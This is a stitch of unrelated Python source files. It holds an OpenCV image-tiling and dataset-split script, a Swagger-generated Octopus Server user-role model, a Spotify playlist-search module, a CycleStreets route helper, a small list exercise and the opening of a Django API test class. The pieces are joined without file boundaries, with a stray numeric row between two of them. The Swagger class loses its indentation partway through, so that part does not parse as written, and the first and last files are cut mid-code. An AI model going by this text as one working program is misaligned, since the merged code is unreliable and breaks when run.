        img2 = cv2.imread("/home/aj/Desktop/DL2/" + str(count) + "/" + f[i + 1], 1)
        img3 = cv2.imread("/home/aj/Desktop/DL2/" + str(count) + "/" + f[i + 2], 1)
        img1f = np.concatenate((img1, img2, img3), axis=1)
        img4 = cv2.imread("/home/aj/Desktop/DL2/" + str(count) + "/" + f[i + 3], 1)
        img5 = cv2.imread("/home/aj/Desktop/DL2/" + str(count) + "/" + f[i + 4], 1)
        img6 = cv2.imread("/home/aj/Desktop/DL2/" + str(count) + "/" + f[i + 5], 1)
        img2f = np.concatenate((img4, img5, img6), axis=1)
        img7 = cv2.imread("/home/aj/Desktop/DL2/" + str(count) + "/" + f[i + 6], 1)
        img8 = cv2.imread("/home/aj/Desktop/DL2/" + str(count) + "/" + f[i + 7], 1)
        img9 = cv2.imread("/home/aj/Desktop/DL2/" + str(count) + "/" + f[i + 8], 1)
        img3f = np.concatenate((img7, img8, img9), axis=1)
        imgf = np.concatenate((img1f, img2f, img3f), axis=0)
        # NOTE(review): the frames/frame_<n> directories are never created (the
        # mkdir calls above are commented out), so this imwrite likely fails
        # silently — confirm before using the frame output.
        cv2.imwrite("/home/aj/Desktop/DL2/frames/frame_" + str(count) + "/" + "f" + str(i + 1) + ".png", imgf)
# print(allimg[0])
# print(label[0:97])
X_train, X_test, y_oldtrain, y_oldtest = train_test_split(allimg, label, test_size=0.40, random_state=42)
# print(y_oldtrain[0:10])
# One-hot encode the 96 class labels for both splits.
y_oldtrain = np.array(y_oldtrain).reshape(-1)
y_train = np.eye(96)[y_oldtrain]
y_oldtest = np.array(y_oldtest).reshape(-1)
y_test = np.eye(96)[y_oldtest]
np.savez_compressed("/home/aj/Desktop/DL2/outfile", X_train=X_train, X_test=X_test, y_train=y_train, y_test=y_test)
# Creating Video
# img_frame=[]
# for i in range (1,97):
# f=[]
# f=os.listdir("/home/aj/Desktop/DL2/frames/frame_"+str(i))
# path="/home/aj/Desktop/DL2/frames/frame_"+str(i)+"/"
# for file in f:
# img = cv2.imread(path+file)
# height,width,layers = img.shape
# size = (width,height)
# img_frame.append(img)
# out = cv2.VideoWriter("/home/aj/Desktop/DL2/assign1.mp4",0x7634706d,5, size)
# for i in range(len(img_frame)):
# out.write(img_frame[i])
# out.release()
# coding: utf-8
"""
Octopus Server API
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen) # noqa: E501
OpenAPI spec version: 2019.6.7+Branch.tags-2019.6.7.Sha.aa18dc6809953218c66f57eff7d26481d9b23d6a
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class UserRoleResource(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'id': 'str',
'name': 'str',
'description': 'str',
'supported_restrictions': 'list[str]',
'space_permission_descriptions': 'list[str]',
'system_permission_descriptions': 'list[str]',
'granted_space_permissions': 'list[str]',
'granted_system_permissions': 'list[str]',
'can_be_deleted': 'bool',
'last_modified_on': 'datetime',
'last_modified_by': 'str',
'links': 'dict(str, str)'
}
attribute_map = {
'id': 'Id',
'name': 'Name',
'description': 'Description',
'supported_restrictions': 'SupportedRestrictions',
'space_permission_descriptions': 'SpacePermissionDescriptions',
'system_permission_descriptions': 'SystemPermissionDescriptions',
'granted_space_permissions': 'GrantedSpacePermissions',
'granted_system_permissions': 'GrantedSystemPermissions',
'can_be_deleted': 'CanBeDeleted',
'last_modified_on': 'LastModifiedOn',
'last_modified_by': 'LastModifiedBy',
'links': 'Links'
}
def __init__(self, id=None, name=None, description=None, supported_restrictions=None, space_permission_descriptions=None, system_permission_descriptions=None, granted_space_permissions=None, granted_system_permissions=None, can_be_deleted=None, last_modified_on=None, last_modified_by=None, links=None): # noqa: E501
"""UserRoleResource - a model defined in Swagger""" # noqa: E501
self._id = None
self._name = None
self._description = None
self._supported_restrictions = None
self._space_permission_descriptions = None
self._system_permission_descriptions = None
self._granted_space_permissions = None
self._granted_system_permissions = None
self._can_be_deleted = None
self._last_modified_on = None
self._last_modified_by = None
self._links = None
self.discriminator = None
if id is not None:
self.id = id
if name is not None:
self.name = name
if description is not None:
self.description = description
if supported_restrictions is not None:
self.supported_restrictions = supported_restrictions
if space_permission_descriptions is not None:
self.space_permission_descriptions = space_permission_descriptions
if system_permission_descriptions is not None:
self.system_permission_descriptions = system_permission_descriptions
if granted_space_permissions is not None:
self.granted_space_permissions = granted_space_permissions
if granted_system_permissions is not None:
self.granted_system_permissions = granted_system_permissions
if can_be_deleted is not None:
self.can_be_deleted = can_be_deleted
if last_modified_on is not None:
self.last_modified_on = last_modified_on
if last_modified_by is not None:
self.last_modified_by = last_modified_by
if links is not None:
self.links = links
@property
def id(self):
"""Gets the id of this UserRoleResource. # noqa: E501
:return: The id of this UserRoleResource. # noqa: E501
:rtype: str
"""
return self._id
@id.setter
def id(self, id):
"""Sets the id of this UserRoleResource.
:param id: The id of this UserRoleResource. # noqa: E501
:type: str
"""
self._id = id
@property
def name(self):
"""Gets the name of this UserRoleResource. # noqa: E501
:return: The name of this UserRoleResource. # noqa: E501
:rtype: str
"""
return self._name
@name.setter
def name(self, name):
"""Sets the name of this UserRoleResource.
:param name: The name of this UserRoleResource. # noqa: E501
:type: str
"""
self._name = name
@property
def description(self):
"""Gets the description of this UserRoleResource. # noqa: E501
:return: The description of this UserRoleResource. # noqa: E501
:rtype: str
"""
return self._description
@description.setter
def description(self, description):
"""Sets the description of this UserRoleResource.
:param description: The description of this UserRoleResource. # noqa: E501
:type: str
"""
self._description = description
@property
def supported_restrictions(self):
    """Gets the supported_restrictions of this UserRoleResource.

    :return: The supported_restrictions of this UserRoleResource.
    :rtype: list[str]
    """
    return self._supported_restrictions

@supported_restrictions.setter
def supported_restrictions(self, supported_restrictions):
    """Sets the supported_restrictions of this UserRoleResource.

    :param supported_restrictions: The supported_restrictions of this UserRoleResource.
    :type: list[str]
    """
    self._supported_restrictions = supported_restrictions
@property
def space_permission_descriptions(self):
    """Gets the space_permission_descriptions of this UserRoleResource.

    :return: The space_permission_descriptions of this UserRoleResource.
    :rtype: list[str]
    """
    return self._space_permission_descriptions

@space_permission_descriptions.setter
def space_permission_descriptions(self, space_permission_descriptions):
    """Sets the space_permission_descriptions of this UserRoleResource.

    :param space_permission_descriptions: The space_permission_descriptions of this UserRoleResource.
    :type: list[str]
    """
    self._space_permission_descriptions = space_permission_descriptions
@property
def system_permission_descriptions(self):
    """Gets the system_permission_descriptions of this UserRoleResource.

    :return: The system_permission_descriptions of this UserRoleResource.
    :rtype: list[str]
    """
    return self._system_permission_descriptions

@system_permission_descriptions.setter
def system_permission_descriptions(self, system_permission_descriptions):
    """Sets the system_permission_descriptions of this UserRoleResource.

    :param system_permission_descriptions: The system_permission_descriptions of this UserRoleResource.
    :type: list[str]
    """
    self._system_permission_descriptions = system_permission_descriptions
@property
def granted_space_permissions(self):
    """Gets the granted_space_permissions of this UserRoleResource.

    :return: The granted_space_permissions of this UserRoleResource.
    :rtype: list[str]
    """
    return self._granted_space_permissions

@granted_space_permissions.setter
def granted_space_permissions(self, granted_space_permissions):
    """Sets the granted_space_permissions of this UserRoleResource.

    Every entry must be one of the permission names the server knows about;
    otherwise a ValueError listing the offending entries is raised.

    :param granted_space_permissions: The granted_space_permissions of this UserRoleResource.
    :type: list[str]
    :raises ValueError: if any entry is not in the generated catalogue below.
    """
    # Generated catalogue of valid permission names — keep in sync with the API spec.
    allowed_values = ["None", "AdministerSystem", "ProjectEdit", "ProjectView", "ProjectCreate", "ProjectDelete", "ProcessView", "ProcessEdit", "VariableEdit", "VariableEditUnscoped", "VariableView", "VariableViewUnscoped", "ReleaseCreate", "ReleaseView", "ReleaseEdit", "ReleaseDelete", "DefectReport", "DefectResolve", "DeploymentCreate", "DeploymentDelete", "DeploymentView", "EnvironmentView", "EnvironmentCreate", "EnvironmentEdit", "EnvironmentDelete", "MachineCreate", "MachineEdit", "MachineView", "MachineDelete", "ArtifactView", "ArtifactCreate", "ArtifactEdit", "ArtifactDelete", "FeedView", "EventView", "LibraryVariableSetView", "LibraryVariableSetCreate", "LibraryVariableSetEdit", "LibraryVariableSetDelete", "ProjectGroupView", "ProjectGroupCreate", "ProjectGroupEdit", "ProjectGroupDelete", "TeamCreate", "TeamView", "TeamEdit", "TeamDelete", "UserView", "UserInvite", "UserRoleView", "UserRoleEdit", "TaskView", "TaskCreate", "TaskCancel", "TaskEdit", "InterruptionView", "InterruptionSubmit", "InterruptionViewSubmitResponsible", "BuiltInFeedPush", "BuiltInFeedAdminister", "BuiltInFeedDownload", "ActionTemplateView", "ActionTemplateCreate", "ActionTemplateEdit", "ActionTemplateDelete", "LifecycleCreate", "LifecycleView", "LifecycleEdit", "LifecycleDelete", "AccountView", "AccountEdit", "AccountCreate", "AccountDelete", "TenantCreate", "TenantEdit", "TenantView", "TenantDelete", "TagSetCreate", "TagSetEdit", "TagSetDelete", "MachinePolicyCreate", "MachinePolicyView", "MachinePolicyEdit", "MachinePolicyDelete", "ProxyCreate", "ProxyView", "ProxyEdit", "ProxyDelete", "SubscriptionCreate", "SubscriptionView", "SubscriptionEdit", "SubscriptionDelete", "TriggerCreate", "TriggerView", "TriggerEdit", "TriggerDelete", "CertificateView", "CertificateCreate", "CertificateEdit", "CertificateDelete", "CertificateExportPrivateKey", "UserEdit", "ConfigureServer", "FeedEdit", "WorkerView", "WorkerEdit", "RunSystem", "SpaceEdit", "SpaceView", "SpaceDelete", "SpaceCreate",
                      "PackageMetadataPush"]  # noqa: E501
    if not set(granted_space_permissions).issubset(set(allowed_values)):
        raise ValueError(
            "Invalid values for `granted_space_permissions` [{0}], must be a subset of [{1}]"  # noqa: E501
            .format(", ".join(map(str, set(granted_space_permissions) - set(allowed_values))),  # noqa: E501
                    ", ".join(map(str, allowed_values)))
        )
    self._granted_space_permissions = granted_space_permissions
@property
def granted_system_permissions(self):
    """Gets the granted_system_permissions of this UserRoleResource.

    :return: The granted_system_permissions of this UserRoleResource.
    :rtype: list[str]
    """
    return self._granted_system_permissions

@granted_system_permissions.setter
def granted_system_permissions(self, granted_system_permissions):
    """Sets the granted_system_permissions of this UserRoleResource.

    Every entry must be one of the permission names the server knows about;
    otherwise a ValueError listing the offending entries is raised.

    :param granted_system_permissions: The granted_system_permissions of this UserRoleResource.
    :type: list[str]
    :raises ValueError: if any entry is not in the generated catalogue below.
    """
    # Generated catalogue of valid permission names — keep in sync with the API spec.
    allowed_values = ["None", "AdministerSystem", "ProjectEdit", "ProjectView", "ProjectCreate", "ProjectDelete", "ProcessView", "ProcessEdit", "VariableEdit", "VariableEditUnscoped", "VariableView", "VariableViewUnscoped", "ReleaseCreate", "ReleaseView", "ReleaseEdit", "ReleaseDelete", "DefectReport", "DefectResolve", "DeploymentCreate", "DeploymentDelete", "DeploymentView", "EnvironmentView", "EnvironmentCreate", "EnvironmentEdit", "EnvironmentDelete", "MachineCreate", "MachineEdit", "MachineView", "MachineDelete", "ArtifactView", "ArtifactCreate", "ArtifactEdit", "ArtifactDelete", "FeedView", "EventView", "LibraryVariableSetView", "LibraryVariableSetCreate", "LibraryVariableSetEdit", "LibraryVariableSetDelete", "ProjectGroupView", "ProjectGroupCreate", "ProjectGroupEdit", "ProjectGroupDelete", "TeamCreate", "TeamView", "TeamEdit", "TeamDelete", "UserView", "UserInvite", "UserRoleView", "UserRoleEdit", "TaskView", "TaskCreate", "TaskCancel", "TaskEdit", "InterruptionView", "InterruptionSubmit", "InterruptionViewSubmitResponsible", "BuiltInFeedPush", "BuiltInFeedAdminister", "BuiltInFeedDownload", "ActionTemplateView", "ActionTemplateCreate", "ActionTemplateEdit", "ActionTemplateDelete", "LifecycleCreate", "LifecycleView", "LifecycleEdit", "LifecycleDelete", "AccountView", "AccountEdit", "AccountCreate", "AccountDelete", "TenantCreate", "TenantEdit", "TenantView", "TenantDelete", "TagSetCreate", "TagSetEdit", "TagSetDelete", "MachinePolicyCreate", "MachinePolicyView", "MachinePolicyEdit", "MachinePolicyDelete", "ProxyCreate", "ProxyView", "ProxyEdit", "ProxyDelete", "SubscriptionCreate", "SubscriptionView", "SubscriptionEdit", "SubscriptionDelete", "TriggerCreate", "TriggerView", "TriggerEdit", "TriggerDelete", "CertificateView", "CertificateCreate", "CertificateEdit", "CertificateDelete", "CertificateExportPrivateKey", "UserEdit", "ConfigureServer", "FeedEdit", "WorkerView", "WorkerEdit", "RunSystem", "SpaceEdit", "SpaceView", "SpaceDelete", "SpaceCreate",
                      "PackageMetadataPush"]  # noqa: E501
    if not set(granted_system_permissions).issubset(set(allowed_values)):
        raise ValueError(
            "Invalid values for `granted_system_permissions` [{0}], must be a subset of [{1}]"  # noqa: E501
            .format(", ".join(map(str, set(granted_system_permissions) - set(allowed_values))),  # noqa: E501
                    ", ".join(map(str, allowed_values)))
        )
    self._granted_system_permissions = granted_system_permissions
@property
def can_be_deleted(self):
    """Gets the can_be_deleted of this UserRoleResource.

    :return: The can_be_deleted of this UserRoleResource.
    :rtype: bool
    """
    return self._can_be_deleted

@can_be_deleted.setter
def can_be_deleted(self, can_be_deleted):
    """Sets the can_be_deleted of this UserRoleResource.

    :param can_be_deleted: The can_be_deleted of this UserRoleResource.
    :type: bool
    """
    self._can_be_deleted = can_be_deleted
@property
def last_modified_on(self):
    """Gets the last_modified_on of this UserRoleResource.

    :return: The last_modified_on of this UserRoleResource.
    :rtype: datetime
    """
    return self._last_modified_on

@last_modified_on.setter
def last_modified_on(self, last_modified_on):
    """Sets the last_modified_on of this UserRoleResource.

    :param last_modified_on: The last_modified_on of this UserRoleResource.
    :type: datetime
    """
    self._last_modified_on = last_modified_on
@property
def last_modified_by(self):
    """Gets the last_modified_by of this UserRoleResource.

    :return: The last_modified_by of this UserRoleResource.
    :rtype: str
    """
    return self._last_modified_by

@last_modified_by.setter
def last_modified_by(self, last_modified_by):
    """Sets the last_modified_by of this UserRoleResource.

    :param last_modified_by: The last_modified_by of this UserRoleResource.
    :type: str
    """
    self._last_modified_by = last_modified_by
@property
def links(self):
    """Gets the links of this UserRoleResource.

    :return: The links of this UserRoleResource.
    :rtype: dict(str, str)
    """
    return self._links

@links.setter
def links(self, links):
    """Sets the links of this UserRoleResource.

    :param links: The links of this UserRoleResource.
    :type: dict(str, str)
    """
    self._links = links
def to_dict(self):
    """Returns the model properties as a dict.

    Recursively serialises nested swagger models: list elements and dict
    values that expose a ``to_dict`` method are converted as well.
    """
    result = {}
    for attr, _ in six.iteritems(self.swagger_types):
        value = getattr(self, attr)
        if isinstance(value, list):
            # Convert each element that is itself a swagger model.
            result[attr] = list(map(
                lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
                value
            ))
        elif hasattr(value, "to_dict"):
            result[attr] = value.to_dict()
        elif isinstance(value, dict):
            # Convert swagger-model values inside plain dicts.
            result[attr] = dict(map(
                lambda item: (item[0], item[1].to_dict())
                if hasattr(item[1], "to_dict") else item,
                value.items()
            ))
        else:
            result[attr] = value
    if issubclass(UserRoleResource, dict):
        # Generator boilerplate: also copy raw dict items when the model
        # subclasses dict (not the case here, but kept by the generator).
        for key, value in self.items():
            result[key] = value
    return result
def to_str(self):
    """Returns the string representation of the model (pretty-printed dict)."""
    return pprint.pformat(self.to_dict())
def __repr__(self):
    """For `print` and `pprint`; delegates to :meth:`to_str`."""
    return self.to_str()
def __eq__(self, other):
    """Two UserRoleResource objects are equal when all attributes match."""
    if isinstance(other, UserRoleResource):
        return self.__dict__ == other.__dict__
    return False
def __ne__(self, other):
    """Returns true if both objects are not equal (inverse of __eq__)."""
    return not (self == other)
| 17,703 | 5,248 |
"""
Does the legwork of searching for matching tracks.
Contains:
(1) Search functions:
- search_message
- search_spotipy
- search_db
- search_lookup
(2) String parsers (to clean title name):
- clean_title
- remove_punctuation
(3) Creates new Spotify playlist.
- create_playlist
"""
from typing import Any, List, Dict, Union
import os
import re
import sqlite3
import time
import spotipy
from spotipy.oauth2 import SpotifyOAuth
from announcer import MessageAnnouncer, format_sse
# Localhost URL to access the application; Flask runs on port 5000 by default
# Adapted from https://github.com/Deffro/statify/blob/dd15a6e70428bd36ecddb5d4a8ac3d82b85c9339/code/server.py#L553
CLIENT_SIDE_URL = "http://127.0.0.1"
PORT = 5000

# Get environment variables.
SPOTIPY_CLIENT_ID = os.getenv("SPOTIPY_CLIENT_ID")
# NOTE(review): the constant is named SPOTIPY_* but reads the env var
# "SPOTIFY_CLIENT_SECRET" — confirm which name deployments actually set
# before unifying the spelling.
SPOTIPY_CLIENT_SECRET = os.getenv("SPOTIFY_CLIENT_SECRET")
SPOTIPY_REDIRECT_URI = f"{CLIENT_SIDE_URL}:{PORT}/callback"
# OAuth scopes: create/modify playlists and read the user's private playlists.
SCOPE = "playlist-modify-public playlist-modify-private playlist-read-private"

# Set up Spotipy; SpotifyOAuth drives the authorization-code flow via /callback.
sp = spotipy.Spotify(auth_manager = SpotifyOAuth(client_id = SPOTIPY_CLIENT_ID,
                                                 client_secret = SPOTIPY_CLIENT_SECRET,
                                                 redirect_uri = SPOTIPY_REDIRECT_URI,
                                                 scope = SCOPE,
                                                 ))

# Create ('instantiate') a MessageAnnouncer object (server-sent-events hub).
announcer = MessageAnnouncer()
"""
(1) Search functions:
- search_message
- search_spotipy
- search_db
- search_lookup
"""
def search_message(message: str, max_search_length: int = 10,
                   query_lookup: Dict[str, list] = dict(), failed_queries: set = set()) -> List[Union[list, Any]]:
    """
    search_message(message, max_search_length = 10)

    Returns a list of song names (change to ids) matching the message.
    Uses regex-style greedy search.

    Song names will be limited to [max_search_length] words (default is 10, can
    be adjusted.)

    Returns songs from Spotify API via spotipy library; if not, checks
    Spotify 1.2M songs dataset via an sqlite3 query.

    Memoizes successful queries (to query_lookup) and failed queries (to
    failed_queries).

    NOTE(review): the mutable default arguments are shared across *all*
    top-level calls, so the memo caches persist for the process lifetime —
    presumably intentional caching, but confirm stale entries are acceptable.

    https://www.kaggle.com/rodolfofigueroa/spotify-12m-songs
    """
    # Split message into list of lower-case, punctuation-free words.
    message = remove_punctuation(message.casefold()).split()
    # Gets up to max_search_length words of message.
    query_length = min(max_search_length, len(message))
    # Search back-ends, cheapest first: memo cache, Spotify API, local DB.
    search_functions = [
        search_lookup,
        search_spotipy,
        search_db,
    ]
    # Wait 0.2 seconds to ensure /creating has loaded (SSE client race).
    time.sleep(0.2)
    # Splits query into prefix and suffix, decrementing prefix, until
    # - prefix exactly matches a song
    # - suffix can be expressed as a list of songs
    for i in range(query_length):
        prefix, suffix = message[:query_length - i], message[query_length - i:]
        prefix, suffix = " ".join(prefix), " ".join(suffix)
        announcer.announce(format_sse(event = "add", data = prefix))
        # Only search if suffix is not known to fail.
        if suffix in failed_queries:
            time.sleep(0.1)
            announcer.announce(format_sse(event = "drop", data = prefix))
            continue  # back to the start of the 'for' loop
        # Looping through search functions,
        for search_function in search_functions:
            # Search for tracks matching prefix.
            prefix_results = search_function(prefix, query_lookup = query_lookup)
            if prefix_results:
                # Memoize the successful prefix lookup.
                query_lookup[prefix] = prefix_results
                print(f"Try: {prefix} in {search_function.__name__.replace('search_', '')}")
                # In announcer: replace prefix, add each track in prefix_results.
                announcer.announce(format_sse(event = "drop", data = prefix))
                for track in map(lambda tracks: tracks[0]["name"], prefix_results):
                    announcer.announce(format_sse(event = "add", data = remove_punctuation(clean_title(track.casefold()))))
                    time.sleep(0.1)
                # Base case: if prefix is whole message, suffix == "", so we should just return prefix.
                if suffix == "":
                    print(f"All done!")
                    announcer.announce(format_sse(event = "lock in"))
                    return prefix_results
                # Recursive case: make sure suffix can be split into songs as well.
                suffix_results = search_message(suffix, max_search_length = max_search_length,
                                                query_lookup = query_lookup, failed_queries = failed_queries)
                # If both are valid, return joined list.
                if suffix_results:
                    results = prefix_results + suffix_results
                    query_lookup[" ".join([prefix, suffix])] = results
                    return results
                # Suffix cannot be split into songs, drop prefix.
                for track in map(lambda tracks: tracks[0]["name"], prefix_results):
                    announcer.announce(format_sse(event = "drop", data = remove_punctuation(clean_title(track.casefold()))))
                    time.sleep(0.1)
                print(f"\"{suffix}\" suffix can't be split.")
                break  # suffix doesn't work, try next prefix-suffix pair
        # for/else: runs only when *no* search function matched this prefix.
        else:
            print(f"\"{prefix}\" doesn't work, moving on.")
            announcer.announce(format_sse(data = "prefix doesn't work, dropping it"))
            announcer.announce(format_sse(event = "drop", data = prefix))
    # Recursive case: failure — remember so this exact message is never retried.
    failed_queries.add(" ".join(message))
    return []
def search_lookup(query: str, query_lookup: Dict[str, list]) -> list:
    """
    Return the memoized results for *query* from query_lookup (the cache
    built up during the initial call of search_message), or an empty list
    when the query has not been resolved before.
    """
    return query_lookup.get(query, [])
def search_spotipy(query: str, query_lookup: Dict[str, list]) -> list:
    """
    Query the Spotify API (via spotipy) and return the tracks whose cleaned
    name matches the cleaned query exactly, as [list-of-{name, id}] — or []
    when nothing matches.

    Note: the query_lookup parameter is not used. It is only included
    in the definition because query_lookup is passed to search_functions.
    """
    wanted = remove_punctuation(query)
    # Ask Spotify for up to 50 candidate tracks by name.
    response = sp.search(q=f"track:\"{query}\"", type="track", limit=50)
    matches = []
    for item in response["tracks"]["items"]:
        if remove_punctuation(clean_title(item["name"].casefold())) == wanted:
            matches.append({"name": item["name"], "id": item["id"]})
    return [matches] if matches else []
def search_db(query: str, query_lookup: Dict[str, list]) -> list:
    """
    Searches tracks.db (1.2 million songs from Spotify from the Kaggle
    database) and returns the matching songs as [list-of-{name, id}],
    or [] when nothing matches.

    Fixed: the previous version never closed the sqlite3 connection,
    leaking one handle per call; the connection is now closed in a
    ``finally`` block.

    Note: the query_lookup parameter is unused; it is kept because all
    search functions share this signature.

    https://www.kaggle.com/rodolfofigueroa/spotify-12m-songs

    :param query: words to match against the pre-cleaned track names
    :param query_lookup: unused (signature compatibility)
    """
    connection = sqlite3.connect("tracks.db")
    try:
        # name_cleaned is assumed to hold titles normalised the same way
        # as remove_punctuation() — confirm against the DB build script.
        rows = connection.execute(
            "SELECT name, id FROM tracks WHERE name_cleaned = ?",
            [remove_punctuation(query)],
        ).fetchall()
    finally:
        connection.close()
    results = [{"name": name, "id": track_id} for name, track_id in rows]
    return [results] if results else []
"""
(2) String parsers (to clean title name):
- clean_title
- remove_punctuation
"""
def clean_title(title):
    """
    Normalise a track title for matching by applying, in order:
      - drop "(...)" / "[...]" chunks and the whitespace before them
        (greedy regex matching)
      - drop " - " and everything after it
      - drop " feat.", " ft(.)", or " featuring" credits and what follows
        (but not words like "feature")

    https://stackoverflow.com/questions/14596884/remove-text-between-and
    """
    patterns = (
        r"\s+\(.+\)",                             # parenthesised chunk
        r"\s+\[.+\]",                             # bracketed chunk
        r" - .*",                                 # " - " and the rest
        r"\W+(ft[:.]?|feat[:.]|featuring)\s.*",   # featured-artist credit
    )
    for pattern in patterns:
        title = re.sub(pattern, "", title)
    return title
def remove_punctuation(title):
    r"""
    Removes punctuation by performing the following transformations:
    - Delete XML escape sequences: &amp; &quot; &lt; &gt; &apos;
      (fixed: the old pattern `&[amp|quot|lt|gt|apos];` was a character
      class, so it only ever matched '&' + one character + ';' and never
      removed a real entity)
    - Replace "/", "//", etc. and surrounding whitespace with " " (in medley titles)
    - Replace "&" and surrounding whitespace with " and "
    - Remove the characters !"#$%'‘’“”()*+,-.:;<=>?@[\]^_—`{|}~
    - Collapse repeated whitespace and strip the ends
    """
    # Entities are dropped *before* the "&" → " and " rewrite below.
    title = re.sub(r"&(amp|quot|lt|gt|apos);", "", title)
    title = re.sub(r"\s*\/+\s*", " ", title)
    title = re.sub(r"\s*&\s*", " and ", title)
    title = re.sub(r"[!\"#$%'‘’“”()*+,-.:;<=>?@[\\\]^_—`{|}~]", "", title)
    title = re.sub(r"\s{2,}", " ", title)
    return title.strip()
"""
(3) Creates new Spotify playlist.
"""
def create_playlist(results):
    """
    Build a Spotify playlist from the result of search_message.

    Takes the [[{name, id}, ...], ...] structure returned by
    search_message, creates a new private playlist via spotipy, adds the
    first track of each group, and returns the playlist's Spotify id.
    """
    # One track id per matched group (the first candidate of each).
    track_ids = [songs[0]["id"] for songs in results]
    # Create the (private, non-collaborative) playlist for the current user.
    playlist = sp.user_playlist_create(
        user=sp.me()["id"],
        name="mixtape50",
        public=False,
        collaborative=False,
        description="Created with Mixtape50: https://github.com/jchanke/mixtape50."
    )
    sp.playlist_add_items(playlist_id=playlist["id"], items=track_ids)
    return playlist["id"]
from urllib import urlencode
from urllib2 import urlopen
import simplejson
from django.conf import settings
from django.contrib.gis.geos import Point, LineString
from django.utils.text import capfirst
from django.utils.translation import ugettext as _
from molly.apps.places.models import bearing_to_compass
from molly.utils.templatetags.molly_utils import humanise_distance, humanise_seconds
# Endpoint template for the CycleStreets journey-planner API (JSON output).
CYCLESTREETS_URL = 'http://www.cyclestreets.net/api/journey.json?%s'

if 'cyclestreets' not in settings.API_KEYS:
    # Cyclestreets not configured; raising ImportError at import time makes
    # the surrounding framework skip this provider instead of failing later.
    raise ImportError()
def generate_route(points, type):
    """
    Given 2 Points, this will return a route between them. The route consists
    of a dictionary with the following keys:

    * error (optional, and if set means that the object contains no route),
      which is a string describing any errors that occurred in plotting the
      route
    * total_time: An int of the number of seconds this route is estimated to
      take
    * total_distance: An int of the number of metres this route is expected to
      take
    * waypoints: A list of dictionaries, where each dictionary has 2 keys:
      'instruction', which is a human-readable description of the steps to be
      taken here, and 'location', which is a Point describing the route to be
      taken

    @param points: An ordered list of points to be included in this route
    @type points: [Point]
    @param type: The type of route to generate (foot, car or bike)
    @type type: str
    @return: A dictionary containing the route and metadata associated with it
    @rtype: dict
    """
    # Build Cyclestreets request:
    url = CYCLESTREETS_URL % urlencode({
        'key': settings.API_KEYS['cyclestreets'],
        'plan': 'balanced',
        # NOTE(review): points serialised as "%f,%f" % (p[0], p[1]) — confirm
        # CycleStreets expects that coordinate order (lon,lat vs lat,lon).
        'itinerarypoints': '|'.join('%f,%f' % (p[0], p[1]) for p in points)
    })
    json = simplejson.load(urlopen(url))
    if not json:
        # Empty/missing response: signal failure to the caller.
        return {
            'error': _('Unable to plot route')
        }
    else:
        # marker[0] carries the whole-journey summary; the rest are legs.
        summary = json['marker'][0]['@attributes']
        waypoints = []
        for i, waypoint in enumerate(json['marker'][1:]):
            segment = waypoint['@attributes']
            waypoints.append({
                # e.g. "Turn left at High Street"
                'instruction': _('%(instruction)s at %(name)s') % {
                    'instruction': capfirst(segment['turn']),
                    'name': segment['name']
                },
                'additional': _('%(direction)s for %(distance)s (taking approximately %(time)s)') % {
                    'direction': bearing_to_compass(int(segment['startBearing'])),
                    'distance': humanise_distance(segment['distance'], False),
                    'time': humanise_seconds(segment['time'])
                },
                # Map the API's turn phrase to the UI's icon identifier;
                # unknown phrases yield None.
                'waypoint_type': {
                    'straight on': 'straight',
                    'turn left': 'left',
                    'bear left': 'slight-left',
                    'sharp left': 'sharp-left',
                    'turn right': 'right',
                    'bear right': 'slight-right',
                    'sharp right': 'sharp-right',
                    'double-back': 'turn-around',
                }.get(segment['turn']),
                # First coordinate pair of the leg is its start location.
                'location': Point(*map(float, segment['points'].split(' ')[0].split(','))),
                'path': LineString(map(lambda ps: Point(*map(float, ps.split(','))),
                                       segment['points'].split(' ')))
            })
        return {
            'total_time': summary['time'],
            'total_distance': summary['length'],
            'waypoints': waypoints,
            'path': LineString(map(lambda ps: Point(*map(float, ps.split(','))), summary['coordinates'].split(' ')))
        }
num_list = [10, 50, 30, 12, 6, 8, 100]

def max_min_first_last(nlist):
    """Return (maximum, minimum, first, last) of the numbers in nlist.

    Completed from the exercise template (the original had ``____`` blanks
    and did not parse). Assumes nlist is non-empty.
    """
    maximum = max(nlist)   # Maximum number
    minimum = min(nlist)   # Minimum number
    first = nlist[0]       # First number
    last = nlist[-1]       # Last number
    return maximum, minimum, first, last

print(max_min_first_last(num_list))
# MIT License
# Copyright (c) 2017 MassChallenge, Inc.
import json
from oauth2_provider.models import get_application_model
from rest_framework.test import APIClient
from test_plus.test import TestCase
from django.core import mail
from django.conf import settings
from django.contrib.auth.models import Group
from django.urls import reverse
from accelerator_abstract.models.base_clearance import (
CLEARANCE_LEVEL_GLOBAL_MANAGER,
CLEARANCE_LEVEL_STAFF
)
from impact.tests.factories import (
ClearanceFactory,
UserFactory,
)
# OAuth application model registered with django-oauth-toolkit.
OAuth_App = get_application_model()
# Group names that gate access to the versioned APIs.
API_GROUPS = [settings.V0_API_GROUP, settings.V1_API_GROUP]
# Presumably templates for asserting over generated iCalendar (.ics)
# content — confirm at call sites.
DESCRIPTION_CONTENT = 'DESCRIPTION:Topics: {topics}'
LOCATION_CONTENT = 'LOCATION:{location}\\;'
LOCATION_INFO = 'LOCATION:{location}\\;{meeting_info}'
class APITestCase(TestCase):
    """Base test case for API tests.

    Provides user factories wired into the API groups, OAuth access-token
    helpers, and assertion helpers for OPTIONS metadata, UI notifications,
    and outgoing email.
    """

    SOME_SITE_NAME = "somesite.com"
    _user_count = 0  # suffix counter used to make each generated email unique
    client_class = APIClient
    user_factory = UserFactory

    @classmethod
    def setUpClass(cls):
        # Fix: super().setUpClass() was never called, skipping Django's
        # class-level fixture setup (e.g. class-wide atomics).
        super().setUpClass()
        for name in API_GROUPS:
            Group.objects.get_or_create(name=name)

    @classmethod
    def tearDownClass(cls):
        for name in API_GROUPS:
            Group.objects.get(name=name).delete()
        # Fix: super().tearDownClass() was never called, leaking Django's
        # class-level fixtures.
        super().tearDownClass()

    def basic_user(self):
        """Create a non-staff user in all API groups (password 'password')."""
        user = self.make_user('basic_user{}@test.com'.format(self._user_count),
                              perms=["mc.view_startup"])
        self._user_count += 1
